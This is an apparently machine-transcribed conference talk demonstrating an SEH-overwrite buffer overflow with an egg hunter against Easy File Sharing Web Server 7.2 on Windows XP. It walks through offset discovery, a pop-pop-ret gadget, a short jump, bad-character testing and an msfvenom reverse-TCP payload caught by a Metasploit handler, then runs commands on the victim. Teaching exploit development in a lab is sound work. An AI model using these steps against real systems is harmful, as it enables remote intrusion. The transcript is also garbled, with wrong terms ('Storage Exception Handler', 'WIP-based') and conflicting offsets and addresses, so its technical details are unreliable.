Hello everyone, welcome to my talk. I'm glad for being here with you all. My talk is called From SEH Overwrite with Egg Hunter to Get a Shell. My name is Rodolpho Concurde, but you can call by my nickname Rodox. A little about me. I'm a penetration tester, instructor of IT, consultant of information security throughout 30 years. I'm a certified digital hacker by BSides Newcastle. I already gave talks at conferences as Hacking the Box, Ekoparty, Covert Conference, Arab Security Conference, MorterueloCON, Stackconf, Team Village, BSides Calgary, etc. I'm an author at Hakin9 Magazine about Stack Overflow, in Pentest Magazine about Covert channel, from Fuzzing to get a shell, from SEH Overwrite to get a shell. I leave here my LinkedIn profile by my email. For who wants take out some doubts, you can write me at my LinkedIn or my email. Our agenda. We will learn what is SEH, Storage Exception Handler, Buffer Overflow. We have a POC. In POC we will learn SEH Overwrite, Short Jump, Egg Hunter, Bad Characters, Reverse Shell, and we have a questions. Exception Handler. Exception Handler is a chunk of code from inside of an application which has the objective to handle any exception that can occur during execution of software. The exception handler looks like with. Here we have try and catch. In try, execute some code. If occurs some exception, should jump to catch. In catch, execute some specific code when exception occurs. So in flow of execution of the software, we will pass for the try, execute some code. If occurs some exception, we will jump to catch. In the catch, we will execute some specific code when exception occurs. The SEH works in chain and they are localized in end of stack. In the classic Buffer Overflow vanilla, the exploit overrides the return address without worrying about writing more bytes in stack. But with the SEH Overwrite technique, it is possible to obtain more space for the shellcode in order to have an exploit more stable. So we have here in our stack, remember that the SEH is localized in end of stack. And here we have next SEH record SEH handler. This SEH work as a chain. An exception is an unexpected event and error that occurs in running system or program. When an exception occurs, the program's normal flow of execution is interrupted. It is important that the application can handle the exceptions or error to continue running normally. The address of the exception handlers are stored on the stack. The Windows operating system has a default handler that catches any exception that is not handled by the program. When Windows handles an exception in application, we usually see the message program has encountered a problem and needs to close. So we learn here that each program has your own exception handler, but Windows has your own exception handler. When the exception handler of the software don't work, the exception handler of the Windows work. And work when we see the message program has encountered a problem needs to close. Buffer Overflow. Buffer Overflow is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundaries and overwrites adjacent memory locations. Might be WIP-based or stack-based. WIP-based. Placed in the memory which allocates a large amount of data and dynamically. Stack-based. Allocate a limited or fixed size of data, such as data from local variables or functions. So we have two classes of buffer overflows, WIP-based and stack-based. Here we have an image of buffer overflow. We have in left image variable 4 with 11 A's, right image variable 4 with 150 A's. As we can see, the stack is overwrite, with a lot amount of character A's. It's overwrite the register BP up SE8. As we can see here, SE8 is localized in the end of the stack. So the SE8 is a resource of Windows to handle the exception handler. And the SE8 of Windows is localized in end of the stack. Now we have a POC. The attacker machine will use the Kali Linux 2020.3 and the vulnerable software that we use is the Easy File Share Web Server 7.2. It's running in Windows XP Service Pack 3. Here we have a link for the load of vulnerable software. All became available on my LinkedIn profile the link for these slides. For after the stalking, who wants to see these slides again and download the vulnerable software, we can find these slides on my LinkedIn profile. So now let's see the video POC. Let's see the video POC. Let's open the vulnerable software. Easy File Sharing Web Server is running on port 80. Let's open the vulnerable debugger, menu file, attach. Let's attach the vulnerable software. Choose the vulnerable software and click in attach. Clicking button run to run the vulnerable software in vulnerable debugger. The vulnerable software is running. Let's open the exploit code with VI. Here we have it's a Python exploit code. It's exploit code in Python, variable crash1 with a lot amount of its characters. This a lot amount of characters will send against the target with objective of cause crash vulnerable software. We will send a method get plus crash1. Below we have a target IP in port 80. This a lot amount of characters was generated by tool Create. Let's get in folder USR share exploit framework tools exploit, and let's execute the tool Create with Create -L, the link 5000, and we have here a lot amount of characters. We will copy this a lot amount of characters and paste in our exploit code For after sending this allotted amount of characters against the target with objective of cause crash in vulnerable software. Copy and paste. Let's save the exploit code. Let's send with Python xskeleton tool, send execute the Python exploit code. And in vulnerable software we have flow of execution paused, active violation, click menu view, SEH chain, and we have a value in SE handler. Now we need to find what's the offset of SE8. What's offset the SE8? For finding the offset of SE8, we use a tool parent offset. We must type parent offset -l link 5000 is a link -q, and we must type the value of SE handler 4635 6646. This is a value of SE handler, and we found offset 4065. 4065 is offset for our SE handler. Let's open the exploit code. Open the exploit code, and then we have here variable crash 1 character A multiplied by 4061 plus B multiplied by 4 plus C multiplied by 4. We will overwrite the SE handler with character B and character C. After plus 90. 90 means noops. Noops means no operations because it's a function that do nothing. 90 is a noop. Noops do nothing. It's a function that do nothing. So let's restart the Monero debugger. Click button run to run the Monero debugger. Let's execute the Python exploit code. We have here active violation again. Click menu view, SE chain, and here we have SE handler overwrite by 43, 43, 43, and the address overwrite by 42, 42, 42. We overwrite the SE handler. Click right button, follow address in stack, and as we can see, we overwrite the SE handler. We have here pointer to next SE record with B, and the SE handler with C. We overwrite the SE handler. So now we get a control of SE handler. We get a control of SE handler because we overwrite SE handler with B, C. let's open the exploit code. Now we need to find an instruction pop-up return. For this, we must type in command bar exclamation mona SE8 exclamation mona SE8. Click menu view log, and as we can see here, only the first 20 pointers are shown here. For more pointers, open SE8 point text. So let's open the SE8 file, local disk C, programs file, immunity debugger. Let's open the file SE8 point text, and we have a lot amount of address. We need to find some address that make pop-up return and with secure mechanisms as false. We use address 10.01.03 FE. We use address 10.01.03 FE. This address is a pop-ECI pop-DI return. With secure mechanisms, ASLR is false, rebase is false, safe SE8 as false, OS is false. We could use other address, but I'll choose this address 10.01.02 FE. This important that is pop-CI pop-DI return. With secure mechanisms, pop-CI pop-DI return. If secure mechanism ASLR is false, rebase is false, safe SE8 as false, OS is false. This important that it has the secure mechanism as false. And in our export code, we type here, we create a variable SE8 with value FE030110. This address is an address for pop-up return 10.01.03 FE. And we type here one line do architecture 8x86 is address FE030110. It's an address for pop-up return. Now we need to find an opcode for instruction jump short jump. For this we use a tool NASM shell. We use a tool NASM shell for find an opcode for instruction pop-up for instruction short jump. We use a tool NASM shell for find opcode of instruction short jump. Now we create a variable in SE8. Now let's type in NASM jump short 8. Jump short 8. We found the opcode EB06. EB06 is an opcode for jump short 8. Again, EB06 is an opcode for short jump 8. We must create a variable in SE8 for short jump. We type x90 is a nup, and we will execute xb06 is a short jump 8. So we put in variable class1 character A multiplied by offset for the SE8. For DAO61 is offset for SE8 plus NSE8 plus SE8 plus nups, that is 90. So we'll execute pop-up return and will return for the short jump, and will execute noop noop EB06. EB06 is a short jump 8. So let's save this exploit code and execute the exploit code to see vulnerable software. We have variable crash1 with character A multiplied by offset of C8 plus NS8 plus S8 plus 90, that's a noop. Let's save the exploit code. Let's restart the Mooney debugger. Restart the Mooney debugger. Run the Mooney debugger. Run the vulnerable software Mooney debugger. Software is running. Execute the exploit code. The flow of execution stopped. Click menu view. SEH chain. Now we have a value in SE Overwrite button. Follow address in stack. And as we can see, we have SE8 record overwrite with short jump 06 EB990 and the SE overwrite with address of pop-pop return, address 10.01.03 FE. 10.01.03 FE is our address for pop-pop return. And the pointer to next SE record, we have a short jump 06 EB990. So now we get a control of SE record. Again, we get a control of SE record. And now we overwrite the SE record with short jump and the SE with pop-pop return. Let's click with the right button, go to expression, and let's find the address 10.01.03 FE. And we found the address 10.01.03 FE is a pop return, pop CI, pop DI, and the return. Click right button, breakpoint toggle, put a breakpoint in pop CI. We put a breakpoint in pop CI. Let's pass flow of execution with Shift F7, click button run, and then we stopped in pop CI. We stopped the flow of execution in breakpoint pop CI. So let's click F7 for pass pop CI, F7 to pass pop DI, and here we are in return. We are in return. Press F7 in return. F7 in return, and we follow out in noop. Here we have noop jump short EB06. As we can see, EB06 means jump short. Let's pass the noops with F7, and the F7 jump short, and we are in noops. We are in noops. As we can see, we have a lot amount of noops, but yet this isn't enough space for put our shellcode. We should now put our shellcode, but I already know that this isn't enough space to put our shellcode. So, when we don't have enough space to put our shellcode, we use a technique called Egg Hunter. In our case, we don't have enough space to put our shellcode here. For this, we use a technique called Egg Hunter. Let's learn more what means technique Egg Hunter. As we can see about the pop-up return, now we need to find the modular instruction of pop-up return. This instruction will, as shown image below, make a return to the pointer to the next SEH record. The pointer to next SEH record will overwrite with a jump to our shellcode to get a reverse shell. Here in flow of execution we have access violation in current SE handler. So in current SE handler we will execute pop return and we will make a return for a pointer to next SEH record. In pointer to next SEH record we make a short jump to our shellcode. Pointer to next SEH was overwritten with a jump to shellcode. So again, the flow of execution is running vulnerable software, so cause access violation. In access violation, in current SE handler, we execute the pop and return for short jump. So we will execute short jump for our shellcode. In our shellcode, we will execute our shellcode to get a reverse shell. But as already said, we don't have enough space to our shellcode. We don't have enough space for our shellcode. In this case, we need to use a technique called Egg Hunter. So we know that we have a little space to our shellcode. For this we use a technique called Egg Hunter. Egg Hunter is a small piece of shellcode which searches for actual bigger shellcode which the attacker was not able to fit in the available buffer space. For this, make use of this little piece of shellcode, Egg Hunter, to redirect the execution flow to shellcode bigger. So, saying better, the Egg Hunter is a small piece of shellcode that will redirect us for a bigger space. In this bigger space, we'll put our shellcode to get a reverse shell. So, remember again, we overwrite SE handler with pop return and the short jump. We'll execute pop return and return for short jump. Short jump execute, short jump short, and the follow out in our loops. In place of these loops, we should put our shellcode to get a reverse shell. But in our case, we don't have enough space. We don't have enough space to put our shellcode here. For this, we use a technique called Egg Hunter. Egg Hunter is a technique where, in place of these loops, we will put a small piece of shellcode. We will put small piece of shellcode called Egg Hunter that will redirect us for a bigger space, where in this bigger space we can put our shellcode to get a reverse shell. Let's see it in the video POC. In place of these loops, we will put our egg hunter. We must type in command bar !mona egg help egg !mona help egg, and we have here command egg. The commands of egg, we have the full value is root. We use it after root. After we learn what means this root, and we must type !mona egg for find egg hunter shellcode. And we have here egg hunter shellcode. Let's copy, right button, copy to clipboard whole line, copy this egg hunter shellcode and paste in our shellcode and paste in our exploit code. Copy this small piece of shellcode of egg hunter and paste in our exploit code. Let's open our exploit code. We have here already pasted egg hunter, right button, paste selection. We have here a shellcode, a small piece of shellcode of egg hunter. We put in variable crash1 character A multiplied by offset of SEH. Plus n SEH plus SEH plus 90 noobs multiplied by 5. Plus egg hunter plus 90 noobs. And we have here payload 2 equals badchars. We have here badchars. We will send against the targets this badchars. This value is since 01 up FF. Since 01 up FF. Let's learn more what the functions of this badchars. Now we need to search for the bad characters. Depending on the application, type of vulnerability, and the protocols used, may be certain characters which are considered bad and should not be used in our buffer or shellcode. One example of bad characters is a 00. This character is considered bad because a null byte is also used to terminate a string copy operation, which would truncate our buffer whenever a null byte appears. So, has some values that for our vulnerable software are considered bad. For this, we will send against the target this value is since 01 up FF to see if occurs some error in our target. We want to send 00 because I already know that 00 is a bad character. But already we needed to know if it exists other bad characters. For this, we will send since 01 up FF against the target for see if occur other errors. If occurs other errors, means that it exists other bad characters. We need to find the bad characters because after we will generate a shellcode without bad characters. We need to generate a shellcode to get a reverse shell without bad characters. Here we have other agent ult plus payload 2. This means that after ult will come our shellcode. After ult will come our payload 2. Payload 2 equals bad characters. Now we put bad characters, but after we put our shellcode. Save the exploit code. Let's restart the Monero debugger. Run this vulnerable soft in Monero debugger. Right button, go to expression, put a breakpoint in POP. Put a breakpoint in POP-CI. Right button POP-CI, breakpoint toggle, put a breakpoint in POP-CI. Put a breakpoint in POP-CI. Now let's execute our exploit code, Python xskeleton 5. Execute our exploit code. We have access violation, pass access violation with Shift F7. Shift F7 to pass access violation. And press F9 or press F9. We follow out in POP-CI. Press breakpoint with F7, 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 F7. Press POP-CI, POP-DI, return with F7, F7. Execute the pop return, follow out in loops, press loops and jump short with F7. Pass our loops and jump short with F7. Here we have a small piece of shellcode. This small piece of shellcode is our egg hunter. Again, this small piece of shellcode is our egg hunter that will redirect us for a bigger space, where in this bigger space we put our shellcode to get a reverse shell. Right button in scans, breakpoint toggle. Let's put a breakpoint in scans. Put a breakpoint in scans to see what is in scans. Click button run. Click button run to running the vulnerable software. The flow of execution will stop in scans. Flow of execution will stop in scans. Right button in EDX. Right button in EDX for see what is in EDX following dump. And as we can see, we have here ult. We have a value here ult. This indicates that after this ult will come our shellcode. After ult will come our shellcode. We'll execute jump di. We'll execute jump di and follow out in our bad characters. We have here 01, 02, 03, 04, 05, 06, 07, 08, 09, 08, 0B, 0C, 0D, 0E, and etc. up FF. we will send against the target this value of bad characters since 01 up FF. Since 01 up FF. For see if occurs some error in vulnerable software. As we can see, we have all this value since 01 up FF. We have all this value since 01 up FF. This means that we don't have more error. So this means that the unique bad characters is a 00. As we can see, we have here all these characters since 01 up FF. That means that we don't have others bad characters beyond 00. So we need to generate our shell code. We need to generate our shell code just without 00. So let's restart the Mooney debugger. Let's restart the Mooney debugger. Run the vulnerable soft Mooney debugger again. Right button, go to expression. Let's find a PopCI return. Let's right button PopCI, breakpoint, toggle. Put a breakpoint in PopCI. Let's open the exploit code. Now let's erase this shell code. Let's erase this old shell code to put in this place our new shell code. For generate our new shell code, we will use a tool MSF Venom. You use a tool MSF Venom for generate our new shell code. Let's use a tool MSF Venom to generate our new shell code. You must type MSF Venom -A architecture x86 - platform Windows -P payload Windows shell reverse TCP add host local IP add port for listen on port 4444 -E encode shikataganai -B avoid bad character 00 -interactive tree -F file Python. Generate our shell code for file Python -B avoiding bad character 00. So here we put -B bad characters avoid bad character 00. We will generate our shell code. Avoiding bad character 00. Because this unique bad characters for our vulnerable software is a 00. So we generate our shell code avoiding bad characters 00. We have variable crash1 character A multiplied by offset plus NS8 plus S8 plus 9 nukes plus egg hunter plus nukes. And below we have variable payload2 equals buff. Buff is our shell code. We have NSE8, our jump short. The B06 is our jump short. SE8, our noop, our pop return. SE8, our pop return. SE8, our pop return. We have our egg hunter. Remember that egg hunter is a small piece of shell code that will redirect us for a bigger space, where in this bigger space we will put our shell code. So let's copy our new shell code and paste in our exploit code. Copy selection. And right button, paste selection. Paste our new shell code in our exploit code. We have here payload2 equals buff, our shell code. Below we have payload equals user hasting ult. After ult will come our payload2. Payload2 equals buff. Buff is our shell code. So after read ult will execute our payload2. Payload2 is equals buff. Buff is our shell code to get a reverse shell. So now let's execute our Metasploit framework to listen on port 4444, wait for connect back. Execute MSF console. Let's configure our Metasploit framework. Let's configure our Metasploit framework. Use multi-handler. Set our Metasploit framework. Set payload. Windows shell reverse TCP. We use a payload Windows shell reverse TCP. Set lhost localhost. Our IP. We configure our Metasploit framework to listen on port 4444 for our local IP using a payload Windows shell reverse TCP. Tell port of local port 4444 and execute exploit. Execute exploit. So now let's execute our exploit code with Python excaleton 6. Execute our exploit code. We have access violation. Pass access violation with Shift F7. The flow of execute is paused. We have access violation. Pass access violation with Shift F7. Shift F7 and press F9 or clicking button run. Flow of execution now is stopped in PopCI. We have stopped in breakpoint PopCI. Pass PopCI, PopDI and return with F7 to execute pop return. We follow out in loops. We will pass loop with F7, and jump short in B06 will pass with F7, pass jump short. We'll follow out in our egg hunter. We have a small piece of shellcode egg hunter. We put right button in scans, backpoint toggle to stop the flow of execution in scans. Clicking button run to continue flow of execution. Stop in scans. Right button EDX. Right button EDX following dump. Here we have our root. This indicates that after this root, we will execute our shellcode. This means that after our root, we will execute our shellcode, because Egg Hunter is a small piece of shellcode that will redirect us for a bigger space, where in this bigger space we will execute our shellcode. Pass with F7, jump DI with F7, and now we have DA, DC, D974. This is our shellcode. As we can see in our exploit code, we have here our shellcode DA, DC, D974, and we can see in our flow of execution of vulnerable software DA, DC, D974. This is our shellcode. Click button run to execute flow of execution, to pass flow of execution. Click button run. And we have in Metasploit, a reverse shell. We got a shell. So we can type net user to see the user of the victim, user Rodolpho and administrator, user of the victim. You can type ipconfig for see the IP of the victim. Is it. So as we can see, we have here in these slides step by step of how you can write your own exploit code using a SEH Overwrite with Egg Hunter technique. Remember that this Egg Hunter is a small piece of the shell code that will redirect us for a bigger space, where in this bigger space we can put our shell code to get a reverse shell, and the bad characters should be found. We must send against the target this character since 01 up FF to find what is these bad characters for this vulnerable software, because we need to avoid the bad characters when we generate our shell code. So we need to generate our shell code without bad characters, for don't occur error when we execute our reverse shell. Is it, everyone? I'll become available on my LinkedIn profile this link for these slides for who want to reproduce this POC. You can download these slides on my LinkedIn profile and execute the step-by-step of how you can write your own exploit code using SEH Overwrite with Egg Hunter technique. Now I open for the questions. Thank you very much.